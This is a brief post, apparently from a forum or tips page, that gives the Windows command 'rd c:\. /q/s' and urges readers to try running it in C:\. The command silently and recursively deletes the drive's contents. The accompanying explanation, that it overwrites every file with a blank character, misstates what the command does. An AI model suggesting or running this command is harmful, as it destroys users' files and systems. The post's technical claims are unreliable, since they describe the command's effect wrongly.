This should be the most powerful command. If you don't believe it, try running it in C:\
rd c:\. /q/s

This is really malicious. It overwrites all files on the C: drive with a blank character containing a carriage return. However, files that are in use still cannot be written to. After execution, the files on the C drive become completely unrecognizable.
